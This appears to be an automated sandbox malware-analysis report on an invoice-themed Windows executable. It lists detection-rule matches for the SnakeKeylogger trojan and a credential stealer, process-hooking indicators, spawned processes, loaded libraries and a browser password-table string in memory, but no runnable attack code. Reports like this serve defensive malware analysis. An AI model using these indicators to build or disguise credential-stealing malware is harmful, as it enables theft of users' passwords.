Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015F4210 0_2_015F4210
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015F6F92 0_2_015F6F92
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015FF4B0 0_2_015FF4B0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015FD604 0_2_015FD604
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_054B0290 0_2_054B0290
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_054B02A0 0_2_054B02A0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB2008 0_2_05AB2008
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB0280 0_2_05AB0280
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB027C 0_2_05AB027C
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F9BA0 0_2_079F9BA0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5588 0_2_079F5588
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F34A8 0_2_079F34A8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F38D0 0_2_079F38D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F38E0 0_2_079F38E0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5078 0_2_079F5078
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F3070 0_2_079F3070
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5069 0_2_079F5069
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F3060 0_2_079F3060
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C146 4_2_0160C146
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01605370 4_2_01605370
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160D281 4_2_0160D281
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C475 4_2_0160C475
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C738 4_2_0160C738
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_016069A9 4_2_016069A9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160E988 4_2_0160E988
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CA11 4_2_0160CA11
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CCE1 4_2_0160CCE1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01606FC8 4_2_01606FC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CFA9 4_2_0160CFA9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160F961 4_2_0160F961
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_016029EC 4_2_016029EC
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160E981 4_2_0160E981
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01603AA1 4_2_01603AA1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01603E09 4_2_01603E09
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09D90 4_2_05A09D90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09668 4_2_05A09668
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A05148 4_2_05A05148
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0CDAF 4_2_05A0CDAF
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0CDC0 4_2_05A0CDC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A08CB1 4_2_05A08CB1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A08CC0 4_2_05A08CC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F4C8 4_2_05A0F4C8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F4D8 4_2_05A0F4D8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0EC28 4_2_05A0EC28
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09C3E 4_2_05A09C3E
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0EC18 4_2_05A0EC18
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09448 4_2_05A09448
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01FA8 4_2_05A01FA8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01F9C 4_2_05A01F9C
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E7CF 4_2_05A0E7CF
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E7D0 4_2_05A0E7D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DF20 4_2_05A0DF20
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DF11 4_2_05A0DF11
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D660 4_2_05A0D660
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D670 4_2_05A0D670
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F923 4_2_05A0F923
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F930 4_2_05A0F930
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A05138 4_2_05A05138
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F080 4_2_05A0F080
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0003F 4_2_05A0003F
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F071 4_2_05A0F071
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00040 4_2_05A00040
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01841 4_2_05A01841
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01850 4_2_05A01850
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00B2D 4_2_05A00B2D
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00B30 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E36B 4_2_05A0E36B
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E378 4_2_05A0E378
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DAB9 4_2_05A0DAB9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A02A90 4_2_05A02A90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DAC8 4_2_05A0DAC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D218 4_2_05A0D218
Sample file is different than original file name gathered from version info
Source: Factura 1-2501377.exe, 00000000.00000002.887691823.0000000007950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.884355765.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.883791192.000000000123E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000004.00000002.3338521669.0000000000DE7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe Binary or memory string: OriginalFilenameXgFu.exeB vs Factura 1-2501377.exe
Uses 32bit PE files
Source: Factura 1-2501377.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Factura 1-2501377.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, U.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, U.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@4/4
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura 1-2501377.exe.log Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Mutant created: NULL
Source: Factura 1-2501377.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Factura 1-2501377.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003287000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003297000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Factura 1-2501377.exe ReversingLabs: Detection: 38%
Source: Factura 1-2501377.exe Virustotal: Detection: 35%
Source: unknown Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: gpapi.dll Jump to behavior
